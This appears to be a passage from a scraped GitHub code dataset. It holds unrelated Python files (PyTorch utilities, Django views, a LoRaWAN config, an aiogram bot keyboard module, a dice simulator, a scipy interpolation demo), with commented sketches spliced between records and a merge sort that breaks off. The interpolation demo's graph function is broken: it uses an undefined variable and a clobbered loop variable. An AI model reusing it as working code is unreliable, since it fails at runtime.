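# alternative (sketch) pushes masked logits to -inf instead, so a masked
# zero-logit is never treated as a real value; it assumes each row has at
# least one valid position:
import torch

def masked_softmax(logits, mask):
    # mask: 1.0 for valid positions, 0.0 for padding
    logits = logits.masked_fill(mask == 0, float("-inf"))
    return torch.softmax(logits, dim=-1)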
sparse_tensortype(indices, values, x.size())\n\n\ndef pack_padded_sequence(padded_sequence, length, batch_firse=False,GPU_INDEX=0):\n _, idx_sort = torch.sort(length, dim=0, descending=True)\n _, idx_unsort = torch.sort(idx_sort, dim=0)\n length = torch.index_select(length, 0, idx_sort)\n if padded_sequence.is_cuda:\n padded_sequence = torch.index_select(padded_sequence, 0, idx_sort.cuda(GPU_INDEX))\n else:\n padded_sequence = torch.index_select(padded_sequence, 0, idx_sort)\n return torch.nn.utils.rnn.pack_padded_sequence(padded_sequence, list(length), batch_first=batch_firse), idx_unsort\n\n\ndef pad_packed_sequence(packed_sequence, idx_unsort, pad_value, batch_firse=False, GPU_INDEX=0):\n padded_sequence, length = torch.nn.utils.rnn.pad_packed_sequence(packed_sequence, batch_first=batch_firse,\n padding_value=pad_value)\n if padded_sequence.is_cuda:\n return torch.index_select(padded_sequence, 0, torch.autograd.Variable(idx_unsort).cuda(GPU_INDEX)), length\n else:\n return torch.index_select(padded_sequence, 0, torch.autograd.Variable(idx_unsort)), length\n\n\ndef pack_sequence(sequences, GPU_INDEX=0):\n length = torch.Tensor([len(seq) for seq in sequences])\n _, idx_sort = torch.sort(length, dim=0, descending=True)\n _, idx_unsort = torch.sort(idx_sort, dim=0)\n sequences = sorted(sequences, key=lambda x: len(x), reverse=True)\n packed_sequences = torch.nn.utils.rnn.pack_sequence(sequences)\n return packed_sequences, idx_unsort\n\n\ndef create_ori_index_to_packed_index_dict(batch_sizes):\n begin_index = 0\n end_index = 0\n res = {}\n for i in range(len(batch_sizes)):\n end_index += batch_sizes[i]\n for j in range(end_index-begin_index):\n res[(j, i)] = begin_index + j\n begin_index += batch_sizes[i]\n return res\n\n\ndef create_stable_log_fn(epsilon):\n def stable_log(softmax_value):\n softmax_value = torch.clamp(softmax_value, epsilon, 1.0-epsilon)\n return torch.log(softmax_value)\n return stable_log\n\n\ndef padded_tensor_one_dim_to_length(one_tensor, dim, padded_length, is_cuda=False, gpu_index=0, fill_value=0):\n before_encoder_shape = list(one_tensor.shape)\n before_encoder_shape[dim] = padded_length - before_encoder_shape[dim]\n expend_tensor = (torch.ones(before_encoder_shape) * fill_value)\n if is_cuda:\n expend_tensor = expend_tensor.cuda(gpu_index)\n padded_outputs = torch.cat((one_tensor, expend_tensor), dim=dim)\n return padded_outputs\n\n\nclass MultiRNNCell(RNNCellBase):\n def __init__(self, cell_list: typing.List[RNNCellBase]):\n super().__init__()\n for idx, module in enumerate(cell_list):\n self.add_module(str(idx), module)\n\n def reset_parameters(self):\n for cell in self._modules.values():\n cell.reset_parameters()\n\n def _get_item_by_idx(self, iterator, idx):\n \"\"\"Get the idx-th item of the iterator\"\"\"\n size = len(self)\n idx = operator.index(idx)\n if not -size <= idx < size:\n raise IndexError('index {} is out of range'.format(idx))\n idx %= size\n return next(islice(iterator, idx, None))\n\n def __getitem__(self, idx):\n if isinstance(idx, slice):\n return MultiRNNCell(OrderedDict(list(self._modules.items())[idx]))\n else:\n return self._get_item_by_idx(self._modules.values(), idx)\n\n def __setitem__(self, idx, module):\n key = self._get_item_by_idx(self._modules.keys(), idx)\n return setattr(self, key, module)\n\n def __delitem__(self, idx):\n if isinstance(idx, slice):\n for key in list(self._modules.keys())[idx]:\n delattr(self, key)\n else:\n key = self._get_item_by_idx(self._modules.keys(), idx)\n delattr(self, key)\n\n def __len__(self):\n return 
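# pack_padded_sequence / pad_packed_sequence above implement the classic
# sort-pack-unsort dance that older PyTorch required: sort by length
# descending, pack, run the RNN, then undo the sort with the inverse
# permutation from a second torch.sort. On PyTorch >= 1.1 the same effect is
# available without manual sorting (a sketch):
import torch

def run_packed(rnn, padded, lengths):
    packed = torch.nn.utils.rnn.pack_padded_sequence(
        padded, lengths.cpu(), batch_first=True, enforce_sorted=False)
    out, _ = rnn(packed)
    out, _ = torch.nn.utils.rnn.pad_packed_sequence(out, batch_first=True)
    return out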
len(self._modules)\n\n def __dir__(self):\n keys = super().__dir__()\n keys = [key for key in keys if not key.isdigit()]\n return keys\n\n def forward(self, h_i, h_s):\n res_h = []\n for h, cell in zip(h_s, self._modules.values()):\n h = cell(h_i, h)\n res_h.append(h)\n if isinstance(cell, torch.nn.LSTMCell):\n h_i = h[0]\n else:\n h_i = h\n return h_i, res_h\n\n\ndef calculate_accuracy_of_code_completion(log_probs, target, ignore_token=None, topk_range=(1, 15), gpu_index=None):\n \"\"\"\n compare the log probility of all possible token with target token. calculate the accuracy of the code.\n ensure dim[1] of log_probs(seq len) is the same as dim[1] of target.\n :param log_probs:\n :param target:\n :param ignore_token:\n :param save_name:\n :param topk_range: (min_k, max_k)\n :return:\n \"\"\"\n # log_probs_size = [batch_size, seq_len, vocab]\n if isinstance(target, list):\n target = torch.LongTensor(target)\n if gpu_index is not None:\n target = target.cuda(gpu_index)\n if isinstance(log_probs, PackedSequence):\n log_probs = log_probs.data\n if isinstance(target, PackedSequence):\n target = target.data\n\n batch_size = log_probs.shape[0]\n vocab_size = log_probs.shape[-1]\n\n log_probs = log_probs.view(-1, vocab_size)\n target = target.view(-1)\n\n if log_probs.shape[0] != target.shape[0]:\n print('different shape between log_probs and target. log_probs: {}, target: {}'.format(log_probs.shape, target.shape))\n raise Exception('different shape between log_probs and target. log_probs: {}, target: {}'.format(log_probs.shape, target.shape))\n\n # if len(log_probs.shape) == 2:\n # log_probs = log_probs.unsqueeze(dim=1)\n\n max_topk = max(*topk_range)\n min_topk = min(*topk_range)\n if min_topk < 1:\n min_topk = 1\n if max_topk < 1:\n max_topk = 1\n\n # top_k_ids_size = [batch_size, seq_len, max_topk]\n top_k_ids = torch.topk(log_probs, dim=1, k=max_topk)[1]\n\n # resize target to the same shape of top k ids\n target = torch.unsqueeze(target, dim=1)\n repeat_shape = [1] * len(target.shape)\n repeat_shape[-1] = max_topk\n repeat_target = target.repeat(*repeat_shape)\n equal_list = torch.eq(top_k_ids, repeat_target)\n\n if ignore_token is not None:\n mask = torch.ne(target, ignore_token)\n zero_tensor = torch.zeros(equal_list.shape).byte()\n if gpu_index is not None:\n zero_tensor = zero_tensor.cuda(gpu_index)\n equal_list = torch.where(mask, equal_list, zero_tensor)\n\n result = {}\n for k in range(min_topk, max_topk+1):\n result[k] = equal_list[:, min_topk-1:k].sum().item()\n return result\n\n\ndef get_predict_and_target_tokens(log_probs, target, id_to_word_fn, k=1, offset=0):\n dim_len = len(log_probs.shape)\n softmaxed_probs = F.softmax(log_probs, dim=dim_len - 1)\n top_k_probs, top_k_ids = torch.topk(softmaxed_probs, dim=2, k=k)\n top_k_ids = top_k_ids.tolist()\n batch_predict = []\n batch_target = []\n for i, one in enumerate(top_k_ids):\n # one shape = [seq_len, k]\n predict_tokens = [transform_id_to_token(one_position, id_to_word_fn, offset=offset) for one_position in one]\n out_token = transform_id_to_token(target[i], id_to_word_fn, offset=offset)\n batch_predict += [predict_tokens]\n batch_target += [out_token]\n return batch_predict, batch_target, top_k_probs.tolist()\n\n\nif __name__ == '__main__':\n a = [torch.Tensor([[1, 2, 3, 4, 0], [4, 3, 2, 1, 5]]),\n torch.Tensor([[1, 2, 3, 4, 0]]),\n torch.Tensor([[1, 2, 3, 4, 0], [4, 3, 2, 1, 5]])]\n b = [torch.LongTensor([3, 4]),\n torch.LongTensor([2, ]),\n torch.LongTensor([3, 1])]\n c, _ = pack_sequence(a)\n d, _ = pack_sequence(b)\n res = 
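# calculate_accuracy_of_code_completion above takes the top-k ids, broadcasts
# the target against them, and masks out ignore_token positions before
# counting hits for each k in [min_topk, max_topk]. A condensed sketch of the
# core idea for a single k:
import torch

def topk_hits(log_probs, target, k=5, ignore_index=None):
    # log_probs: (N, vocab), target: (N,)
    topk = log_probs.topk(k, dim=1).indices            # (N, k)
    hits = topk.eq(target.unsqueeze(1))                # (N, k) bool
    if ignore_index is not None:
        hits = hits & target.ne(ignore_index).unsqueeze(1)
    return hits.any(dim=1).sum().item()                # targets hit within top-k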
calculate_accuracy_of_code_completion(c, d, topk_range=(1, 3), ignore_token=-1)\n print(res)","repo_name":"ssiq/GrammaLanguageModel","sub_path":"common/torch_util.py","file_name":"torch_util.py","file_ext":"py","file_size_in_byte":9384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"31515068695","text":"from django.shortcuts import render, get_object_or_404\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\nfrom django.http import HttpResponse\nfrom django.views.generic import ListView\nfrom .models import Post\nimport markdown\n\n\nclass IndexView(ListView):\n # model = Post\n template_name = 'testblog/index.html'\n context_object_name = 'posts'\n\n def get_queryset(self): # 重写get_queryset方法,只获取前15条记录给首页显示。\n # return super(IndexView, self).get_queryset()[:15]\n return Post.objects.order_by('-created_time')[:15]\n\n# def home(request):\n# posts = Post.objects.all()\n\n# return render(request, 'testblog/index.html', context={\n# 'posts': posts\n# })\n\n\ndef read(request, title):\n post = get_object_or_404(Post, title=title)\n post.body = markdown.markdown(post.body,\n extensions=[\n 'markdown.extensions.extra',\n 'markdown.extensions.codehilite',\n 'markdown.extensions.toc', ])\n\n return render(request, 'testblog/post.html', context={\n 'post': post\n })\n\n\ndef archive(request):\n post_list = Post.objects.order_by('-created_time')\n paginator = Paginator(post_list, 15)\n page = request.GET.get('page')\n total_num = paginator.num_pages\n try:\n posts = paginator.page(page)\n except PageNotAnInteger:\n page = 1\n posts = paginator.page(1)\n except EmptyPage:\n posts = paginator.page(paginator.num_pages)\n\n return render(request, 'testblog/archive.html',\n {'posts': posts, 'page': page,\n 'total_num': total_num})\n","repo_name":"Reignoverme/buzzblog","sub_path":"article/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1744,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"14352362970","text":"import machine\nimport binascii\nimport ubinascii\n\n# Get the WiFi MAC address\nWIFI_MAC = ubinascii.hexlify(machine.unique_id()).upper()\n# Set the Gateway ID to be the first 3 bytes of MAC address + 'FFFE' + last 3 bytes of MAC address\nGATEWAY_ID = WIFI_MAC[:6] + \"FFFE\" + WIFI_MAC[6:12]\n\n# The Things Network Settings\nSERVER = 'router.eu.thethings.network'\nPORT = 1700\n\n# NTP Settings\nNTP = \"pool.ntp.org\"\nNTP_PERIOD_S = 3600\n\n# WiFi settings\nWIFI_SSID = 'xxxxxxxxxxxxxxxx'\nWIFI_PASS = 'xxxxxxxxxxxxxxxx'\n\nDHCP = True\nif not DHCP:\n IP_ADDR = '192.168.0.x'\n IP_MASK = '255.255.255.0'\n IP_GATE = '192.168.0.1'\n IP_DNS = '192.168.0.1'\n\n#LoRa Application keys\nLORA_APP_EUI = binascii.unhexlify('xxxxxxxxxxxxxxxx')\nLORA_APP_KEY = binascii.unhexlify('xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx')\n\n#LoRa frequency for AU915\nLORA_FREQUENCY = 923300000\n\n# Time deplay between updates\nTIMEOUT = 5","repo_name":"chittams/LoRaWAN-OTAA","sub_path":"lib/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":888,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"7176424904","text":"import pygame\nimport os\n\npygame.mixer.init()\n\nmain_dir = os.path.split(os.path.abspath(__file__))[0]\n\n\ndef load_sound(file):\n \"\"\" Loads a soundfile fron data directory \"\"\"\n file = os.path.join(main_dir, 'data', file)\n return pygame.mixer.Sound(file)\n\n# def 
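# The LoRaWAN config record above derives a 64-bit gateway EUI from the
# 48-bit WiFi MAC by splicing 'FFFE' into the middle, the usual MAC-to-EUI-64
# convention for single-channel gateways. The same derivation as a plain
# function (sketch):
def mac_to_gateway_eui(mac_hex):
    # mac_hex: 12 hex chars, e.g. 'AABBCCDDEEFF' -> 'AABBCCFFFEDDEEFF'
    return mac_hex[:6] + "FFFE" + mac_hex[6:12]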
load_music(file):\n# \"\"\" Loads a soundfile fron data directory \"\"\"\n# file = os.path.join(main_dir, 'data', file)\n# return pygame.mixer.music.load(file)\n\n\nflag_sound = load_sound(\"flag_sound.wav\")\n\nshoot_sound = load_sound(\"tank_shoot_sound.wav\")\n\nbox_sound = load_sound(\"box_sound.wav\")\n\nbackground_music = load_sound(\"background_music.wav\")\n\ntank_shot_sound = load_sound(\"tank_shot_sound.wav\")\n\nvictory_sound = load_sound(\"victory_sound.wav\")\n\n\n\n\n\n","repo_name":"Joar-E/TDDE25---Project","sub_path":"ctf-master/sounds.py","file_name":"sounds.py","file_ext":"py","file_size_in_byte":726,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"43139753206","text":"from matplotlib import pyplot as mpl\nfrom matplotlib.animation import FuncAnimation\nfrom scipy.interpolate import CubicSpline as cs\nfrom scipy.interpolate import Akima1DInterpolator as ak\nfrom scipy.interpolate import BarycentricInterpolator as bc\nimport numpy as np\n\n# methiod that will graph different interpolation of the function\ndef animate(fun, s, xl, yl, nf):\n\n minx = xl[0]\n miny = yl[0]\n maxx = xl[1]\n maxy = yl[1]\n\n f, g = mpl.subplots()\n p = 1000\n xval, yval = [],[]\n xval = np.linspace(minx, maxx, p)\n for i in xval:\n yval.append(fun(i))\n \n mpl.plot(xval, yval, label=\"True\", c=\"blue\")\n\n # Graphs to plot\n l = []\n (akm,) = mpl.plot(l, l, label=\"Akima\", c=\"green\")\n (bry,) = mpl.plot(l, l, label=\"Barycentric\", c=\"purple\")\n (cub,) = mpl.plot(l, l, label=\"Cubic Spline\", c=\"red\")\n\n plot = [cub, akm, bry]\n\n # Initializes the value to graph\n def init():\n g.set_ylabel(\"f(x)\")\n g.set_xlabel(\"x\")\n g.set_ylim(miny, maxy)\n g.set_title(f\"Different Interpolations of {s}\")\n\n return plot\n\n # method to animate the graphs\n def graph(f):\n \n x,y = [],[]\n r = np.random.rand(f)\n n = list(r)\n x = sorted(n)\n for y in x:\n y.append(x[i])\n\n g.set_title(f\"Different Interpolations of {s} for {f} samples\")\n akm.set_data(xval, ak(x, y)(xval))\n bry.set_data(xval, bc(x, y)(xval))\n cub.set_data(xval, cs(x, y)(xval))\n\n return plot\n\n # Setting up the animate\n gif = FuncAnimation(f, graph, blit=True, frames=nf, init_func=init)\n\n mpl.legend()\n mpl.show()\n return gif\n\n# Sample Given Test Function\ndef eval(x):\n\n s = np.sin(x * 30)\n t = np.tan(x)\n e = np.exp(x)\n p = t * s * e\n return p\n\np=\"tan(x)⋅sin(30x)⋅eˣ\"\ngif = animate(fun=eval,s=p,xl=(0, 1),yl=(-4, 4),nf=100)\n","repo_name":"Mak1226/Computational_Methods_And_Applications","sub_path":"week3/q5.py","file_name":"q5.py","file_ext":"py","file_size_in_byte":1888,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"72949183991","text":"#aiogram imports\nfrom aiogram.types import InlineKeyboardMarkup, ReplyKeyboardMarkup, KeyboardButton, InlineKeyboardButton, ReplyKeyboardRemove\n\n\n\ndef start_markup(lang='ru'):\n mattresses_btn = {\n 'ru': KeyboardButton('Матрасы \\U0001F6CF'),\n 'en': KeyboardButton('Mattresses \\U0001F6CF'),\n 'kg': KeyboardButton('Матрацтар \\U0001F6CF'),\n } #display inline buttons with mattresses' categories\n\n accessories_btn = {\n 'ru': KeyboardButton('Аксессуары \\U0001F45C'),\n 'en': KeyboardButton('Accessories \\U0001F45C'),\n 'kg': KeyboardButton('Аксессуарлар \\U0001F45C'),\n } #display accessories\n about_us_btn = {\n 'ru': KeyboardButton('О нас \\U0001F4F0'),\n 'en': KeyboardButton('About Us \\U0001F4F0'),\n 'kg': KeyboardButton('Биз жөнүндө 
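# The graph(f) callback in the interpolation demo (q5.py, above) looks
# garbled: it rebinds y inside 'for y in x' and references an undefined i.
# The intended sampling step is presumably to draw f random abscissae, sort
# them, and evaluate the target function at each. A working version under
# that reading (sketch):
import numpy as np

def sample_points(fun, n):
    x = np.sort(np.random.rand(n))   # n random points in [0, 1), ascending
    y = [fun(xi) for xi in x]        # function values at those points
    return x, y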
\\U0001F4F0'),\n } #send about us text and a website link\n social_media_btn = {\n 'ru': KeyboardButton('Мы в социальных сетях \\U0001F4E8'),\n 'en': KeyboardButton('Our social media \\U0001F4E8'),\n 'kg': KeyboardButton('Биздин социалдык тармактар \\U0001F4E8'),\n } #send another markup with social media links\n leave_review_btn = {\n 'ru': KeyboardButton('Оставить отзыв \\U0001F4DD'),\n 'en': KeyboardButton('Leave a review \\U0001F4DD'),\n 'kg': KeyboardButton('Пикир калтыруу \\U0001F4DD'),\n } #ask for a review in an FSM and store it\n reviews_btn = {\n 'ru': KeyboardButton('Отзывы \\U0001F4D6'),\n 'en': KeyboardButton('Reviews \\U0001F4D6'),\n 'kg': KeyboardButton('Пикирлер \\U0001F4D6'),\n } #shows available reviews\n change_language_btn = {\n 'ru': KeyboardButton('Поменять язык \\U0001F524'),\n 'en': KeyboardButton('Change language \\U0001F524'),\n 'kg': KeyboardButton('Тилди өзгөртүү \\U0001F524'),\n } #shows abailable languages\n receive_notifications_btn = {\n 'ru': KeyboardButton('Получать сообщения о скидках \\U0001F523'),\n 'en': KeyboardButton('Receive notifications about discounts \\U0001F523'),\n 'kg': KeyboardButton('Арзандатуулар жөнүндө информация билип туруу \\U0001F523'),\n }\n return ReplyKeyboardMarkup(resize_keyboard=True).add(mattresses_btn[lang], accessories_btn[lang]).add(about_us_btn[lang]).add(social_media_btn[lang]).add(leave_review_btn[lang], reviews_btn[lang], change_language_btn[lang]).add(receive_notifications_btn[lang])\n\ndef mattresses_catalog(lang='ru'):\n #The following inline buttons show up when 'see_mattrasses' is called\n all_mattresses = {\n 'ru': InlineKeyboardButton('Все матрасы \\U0001F30D', callback_data='category_all'),\n 'en': InlineKeyboardButton('All the mattresses \\U0001F30D', callback_data='category_all'),\n 'kg': InlineKeyboardButton('Бардык матрацтар \\U0001F30D', callback_data='category_all'),\n }\n big_discount_mattresses = {\n 'ru': InlineKeyboardButton('Матрасы со скидками \\U0001F4B2', callback_data='category_dsc'),\n 'en': InlineKeyboardButton('Discounted Mattresses \\U0001F4B2', callback_data='category_dsc'),\n 'kg': InlineKeyboardButton('Арзандатуулар менен матрацтар \\U0001F4B2', callback_data='category_dsc'),\n }\n cheap_mattresses = {\n 'ru': InlineKeyboardButton('Недорогие матрасы \\U0001F495', callback_data='category_chp'),\n 'en': InlineKeyboardButton('Inexpensive mattresses \\U0001F495', callback_data='category_chp'),\n 'kg': InlineKeyboardButton('Арзан матрацтар \\U0001F495', callback_data='category_chp'),\n }\n heavy_mattresses = {\n 'ru': InlineKeyboardButton('Для тяжёлых людей \\U0001F62C', callback_data='category_hvy'),\n 'en': InlineKeyboardButton('For heavy people \\U0001F62C', callback_data='category_hvy'),\n 'kg': InlineKeyboardButton('Оор адамдар үчүн \\U0001F62C', callback_data='category_hvy'),\n }\n hard_mattresses = {\n 'ru': InlineKeyboardButton('Жёсткие матрасы \\U0001F5FF', callback_data='category_hrd'),\n 'en': InlineKeyboardButton('Hard mattresses \\U0001F5FF', callback_data='category_hrd'),\n 'kg': InlineKeyboardButton('Катуу матрацтар \\U0001F5FF', callback_data='category_hrd'),\n }\n soft_mattresses = {\n 'ru': InlineKeyboardButton('Мягкие матрасы \\U0001F607', callback_data='category_sft'),\n 'en': InlineKeyboardButton('Soft mattresses \\U0001F607', callback_data='category_sft'),\n 'kg': InlineKeyboardButton('Жумшак матрацтар \\U0001F607', callback_data='category_sft'),\n }\n kid_mattresses = {\n 'ru': InlineKeyboardButton('Детские матрасы \\U0001F476', callback_data='category_kid'),\n 'en': 
InlineKeyboardButton('Kid mattresses \\U0001F476', callback_data='category_kid'),\n 'kg': InlineKeyboardButton('Балдар үчүн матрацтар \\U0001F476', callback_data='category_kid'),\n }\n return InlineKeyboardMarkup().add(all_mattresses[lang]).add(big_discount_mattresses[lang]).add(cheap_mattresses[lang]).add(heavy_mattresses[lang]).add(kid_mattresses[lang]).add(hard_mattresses[lang], soft_mattresses[lang])\n\ndef product_inline_keyboard(product_name: str, lang='ru'):\n place_order = {\n 'ru': InlineKeyboardButton('Оформить заказ', callback_data=f'choose_{product_name}'),\n 'en': InlineKeyboardButton('Place an order', callback_data=f'choose_{product_name}'),\n 'kg': InlineKeyboardButton('Заказ кылуу', callback_data=f'choose_{product_name}'),\n }\n\n text_manager = {\n 'ru': InlineKeyboardButton('Написать консультанту', url='https://t.me/toktokozhoev'),\n 'en': InlineKeyboardButton('Text a manager', url='https://t.me/toktokozhoev'),\n 'kg': InlineKeyboardButton('Менеджерге жазуу', url='https://t.me/toktokozhoev'),\n }\n\n return InlineKeyboardMarkup().row(place_order[lang], text_manager[lang])\n\ndef website_inline_keyboard(lang='ru'):\n website_link_button = {\n 'ru': InlineKeyboardButton('Перейти на сайт', url='https://www.ormatt.kg/'),\n 'en': InlineKeyboardButton('Go to the website', url='https://www.ormatt.kg/'),\n 'kg': InlineKeyboardButton('Сайтка шилтеме', url='https://www.ormatt.kg/'),\n }\n return InlineKeyboardMarkup().add(website_link_button[lang])\n\ndef social_media_inline_keyboard(lang='ru'):\n instagram_inline_btn = {\n 'ru': InlineKeyboardButton(text='Инстаграм', url='https://www.instagram.com/ormatt.kg'),\n 'en': InlineKeyboardButton(text='Instagram', url='https://www.instagram.com/ormatt.kg'),\n 'kg': InlineKeyboardButton(text='Инстаграм', url='https://www.instagram.com/ormatt.kg'),\n }\n facebook_inline_btn = {\n 'ru': InlineKeyboardButton(text='Фейсбук', url='https://www.facebook.com/ormattmattresses/'),\n 'en': InlineKeyboardButton(text='Facebook', url='https://www.facebook.com/ormattmattresses/'),\n 'kg': InlineKeyboardButton(text='Фейсбук', url='https://www.facebook.com/ormattmattresses/'),\n }\n email_inline_btn = {\n 'ru': InlineKeyboardButton(text='E-mail \\U0001F4E7', url='mailto:ormatt.kg@gmail.com'),\n 'en': InlineKeyboardButton(text='E-mail \\U0001F4E7', url='mailto:ormatt.kg@gmail.com'),\n 'kg': InlineKeyboardButton(text='E-mail \\U0001F4E7', url='mailto:ormatt.kg@gmail.com'),\n }\n\n return InlineKeyboardMarkup().add(instagram_inline_btn[lang]).add(facebook_inline_btn[lang]).add(email_inline_btn[lang])\n\ndef change_language_inline_keyboard():\n return InlineKeyboardMarkup().add(InlineKeyboardButton('КЫР', callback_data='language_kg'), InlineKeyboardButton('РУС', callback_data='language_ru'), InlineKeyboardButton('ENG', callback_data='language_en'))\n\ndef leave_a_review_cancel(lang='ru'):\n cancel = {\n 'ru': KeyboardButton('Отмена \\U0001F555'),\n 'en': KeyboardButton('Cancel \\U0001F555'),\n 'kg': KeyboardButton('Жокко чыгаруу \\U0001F555'),\n }\n return ReplyKeyboardMarkup(resize_keyboard=True).add(cancel[lang])\n\ndef cancel_buy_markup(lang='ru'):\n cancel = {\n 'ru': KeyboardButton('Отмена \\U0001F554'),\n 'en': KeyboardButton('Cancel \\U0001F554'),\n 'kg': KeyboardButton('Жокко чыгаруу \\U0001F554'),\n }\n return ReplyKeyboardMarkup(resize_keyboard=True).add(cancel[lang])\n\ndef phone_number_buy_markup(lang='ru'):\n text = {\n 'ru': KeyboardButton('Номер', request_contact=True),\n 'en': KeyboardButton('Number', request_contact=True),\n 'kg': 
KeyboardButton('Номер', request_contact=True),\n }\n return ReplyKeyboardMarkup(resize_keyboard=True).add(text[lang])\n\ndef receive_notifications_yes_not_markup(lang='ru'):\n yes = {\n 'ru': InlineKeyboardButton('Да', callback_data='receive_notifications_1'),\n 'en': InlineKeyboardButton('Yes', callback_data='receive_notifications_1'),\n 'kg': InlineKeyboardButton('Ооба', callback_data='receive_notifications_1'),\n }\n\n no = {\n 'ru': InlineKeyboardButton('Нет', callback_data='receive_notifications_0'),\n 'en': InlineKeyboardButton('No', callback_data='receive_notifications_0'),\n 'kg': InlineKeyboardButton('Жок', callback_data='receive_notifications_0'),\n }\n\n return InlineKeyboardMarkup().add(yes[lang], no[lang])\n\ncontact_link_button = InlineKeyboardButton('Написать консультанту', url='https://www.t.me/toktokozhoev')\ncontact_markup = InlineKeyboardMarkup().add(contact_link_button)","repo_name":"sophiessa/ormatt_bot","sub_path":"keyboards/client_keyboards.py","file_name":"client_keyboards.py","file_ext":"py","file_size_in_byte":10027,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"7341434825","text":"# Dice Simulator with API (random.org) and GUI\n\nimport random\nimport json\nimport requests\nimport PySimpleGUI as psg\nimport webbrowser\n\n# Version\nversion = 'beta'\n\n# Dictionary with dice images\ndice_art_dict = {\n 1: 'images/1.png',\n 2: 'images/2.png',\n 3: 'images/3.png',\n 4: 'images/4.png',\n 5: 'images/5.png',\n 6: 'images/6.png',\n 7: 'images/title.png',\n 8: 'images/close.png'\n}\n\n# Customization\ntheme = psg.theme('black')\nfont = 'Young'\n\n\ndef create_window():\n # Function with application layout\n\n layout = [\n [psg.VPush()],\n [psg.Push(), psg.Image(dice_art_dict[8], pad=0,\n enable_events=True,\n key=\"-CLOSE-\")],\n [psg.Text(\"GitHub\",\n font=f'{font} 10',\n text_color=\"light green\",\n enable_events=True,\n key=\"-LINK-\"),\n psg.Push(),\n psg.Text(f'Version: {version}', font=f'{font} 10')],\n [psg.VPush()],\n [psg.Image(dice_art_dict[7], key=\"-OUTPUT-\", size=(200, 200))],\n [psg.VPush()],\n [psg.Text(\"PRESS ROLL TO PLAY\", font=f'{font} 10')],\n [psg.VPush()],\n [psg.Button(\"ROLL\", key=\"-ROLL-\",\n border_width=0,\n size=(5, 2),\n button_color=('white', \"red\"),\n font=f'{font} 16')],\n [psg.VPush()],\n [psg.Text(\"ROLLED NUMBERS:\", font=f'{font} 10')],\n [psg.Text(\"\", key=\"-ROLLED-\", font=f'{font} 12')],\n [psg.VPush()],\n [psg.Text(\"AVERAGE:\", font=f'{font} 10')],\n [psg.Text(\"\", key=\"-AVG-\", font=f'{font} 12')],\n [psg.VPush()]\n ]\n\n return psg.Window(\"Dice Simulator\", layout,\n size=(300, 520),\n no_titlebar=True,\n element_justification=\"center\",\n grab_anywhere=True,\n finalize=True)\n\n\ndef roll_dice():\n # This function uses layout to create a window and contains all logic to roll the dice\n window = create_window()\n\n dice_list_str = []\n dice_list_int = []\n number_of_rolls = 0\n\n # Main loop\n while True:\n event, values = window.read()\n if event in (psg.WIN_CLOSED, \"-CLOSE-\"):\n break\n\n # GitHub link event\n if event in \"-LINK-\":\n webbrowser.open(\"https://github.com/paichiwo\")\n\n # Rolling dice\n if event == \"-ROLL-\":\n try:\n # Try rolling dice with API\n url = 'https://api.random.org/json-rpc/1/invoke'\n data = {'jsonrpc': '2.0',\n 'method': 'generateIntegers',\n 'params': {'apiKey': 'Your API key', # YOUR KEY\n 'n': 1, 'min': 1, 'max': 6,\n 'base': 10}, 'id': 1}\n\n params = json.dumps(data)\n response = requests.post(url, params)\n 
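# The aiogram keyboard module above repeats a three-language dict for every
# button. A small factory keyed on the same 'ru'/'en'/'kg' codes would remove
# most of that duplication (a sketch against the aiogram v2 API the file
# already uses; 'translations' is an illustrative table, not from the repo):
from aiogram.types import KeyboardButton, ReplyKeyboardMarkup

translations = {
    "mattresses": {"ru": "Матрасы \U0001F6CF",
                   "en": "Mattresses \U0001F6CF",
                   "kg": "Матрацтар \U0001F6CF"},
}

def button(key, lang="ru"):
    return KeyboardButton(translations[key][lang])

def menu(keys, lang="ru"):
    markup = ReplyKeyboardMarkup(resize_keyboard=True)
    for key in keys:
        markup.add(button(key, lang))
    return markup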
json_dict = response.json()\n final = json_dict['result']['random']['data']\n dice = final[0]\n\n # If API fails use random module to roll the dice\n except requests.ConnectionError:\n dice = random.randint(1, 6)\n except requests.HTTPError:\n dice = random.randint(1, 6)\n except KeyError:\n dice = random.randint(1, 6)\n\n # Count number of rolls\n number_of_rolls += 1\n\n # Display rolled dice result image\n output_msg = dice_art_dict[dice]\n\n # Append result to list of strings and list of integers\n dice_list_str.append(str(dice))\n dice_list_int.append(dice)\n\n # Scroll if there are more than 18 results (>18 results will be longer than app width)\n if len(dice_list_str) > 18:\n del(dice_list_str[0])\n\n # Count sum of list with integers\n sum_of_rolls = sum(dice_list_int)\n\n # Convert list to sequence of numbers\n rolled_numbers = \", \".join(dice_list_str)\n\n # Display results\n window[\"-OUTPUT-\"].update(output_msg, size=(200, 200))\n window[\"-ROLLED-\"].update(rolled_numbers)\n window[\"-AVG-\"].update(round(sum_of_rolls / number_of_rolls, 3))\n\n window.close()\n\n\nif __name__ == '__main__':\n roll_dice()\n","repo_name":"paichiwo/dice-simulator","sub_path":"Dice_Simulator.py","file_name":"Dice_Simulator.py","file_ext":"py","file_size_in_byte":4415,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"6626976201","text":"'''\n目的:归并排序数组\n算法:利用递归的方法,如长度为1则直接返回,否则分为两组left和right,\n再将left和right分别归并排序。返回的结果是两组已排好的子列,将两子列\n从头遍历,比较头元素大小,进行合并。\n输入:待排序数组,如:[3, 7, 4, 8, 6, 1, 5, 2, 9]\n输出:已排序好数组,如:[1, 2, 3, 4, 5, 6, 7, 8, 9]\n时间复杂度:O(nlogn) 空间复杂度:O(1)\n算法稳定\n'''\n\ndef merge(left, right):\n res = []\n while len(left)>0 and len(right)>0:\n if left[0]<right[0]:\n res.append(left.pop(0))\n else:\n res.append(right.pop(0))\n if 